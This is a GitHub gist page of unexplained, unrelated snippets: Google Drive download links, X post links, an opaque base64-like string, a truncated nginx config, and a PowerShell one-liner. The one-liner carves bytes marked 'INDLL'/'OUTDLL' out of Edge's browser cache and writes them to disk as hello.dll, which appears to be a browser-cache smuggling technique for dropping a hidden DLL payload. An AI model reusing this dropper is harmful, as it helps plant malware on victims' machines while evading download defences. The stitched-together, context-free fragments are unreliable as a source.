Skip to content

Instantly share code, notes, and snippets.

View justaguywhocodes's full-sized avatar

Toussaint Louverture justaguywhocodes

View GitHub Profile
xMnueFSYC65LbBsCOGJKj29N0fU8ZEPJ0NqZZiARbW0=
https://drive.usercontent.google.com/download?id=1BldTmj6J64FnN99ME58fJObKOD-5itdP&export=download&authuser=0
https://drive.usercontent.google.com/download?id=19Ky0dYV9LZzToO3H74PI3gf5eMqFxeCH&export=download&authuser=0
https://drive.usercontent.google.com/download?id=10rDMwX27ySlt9kWUp479WxWsCzHUuiy2&export=download&authuser=0
https://drive.usercontent.google.com/download?id=1MVxdeynOyntjLVRiO2sm15hmVbsA6CxX&export=download&authuser=0
https://drive.usercontent.google.com/download?id=1g6F-y9bkNrIWE8OJXoE_-2C0Mp4hETEm&export=download&authuser=0
https://drive.usercontent.google.com/download?id=1BuPErom0tZmzEJtQPLl5CMDNTkbTIs2l&export=download&authuser=0
https://x.com/thebabylonbee/status/1981492100668473805?s=46
https://x.com/Fullcourtpass/status/1980771059768136093
$d="$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Cache\Cache_Data"; gci $d -File | % { $f=$_.FullName; try { $b=[IO.File]::ReadAllBytes($f); $s=[Text.Encoding]::Default.GetString($b); if ($s -match '(?s)(?<=INDLL)(.*?)(?=OUTDLL)') { [IO.File]::WriteAllBytes("$d\hello.dll", [Text.Encoding]::Default.GetBytes($matches[1])) } } catch { } }
user www-data;
worker_processes auto;
worker_cpu_affinity auto;
pid /run/nginx.pid;
error_log /var/log/nginx/error.log;
include /etc/nginx/modules-enabled/*.conf;
events {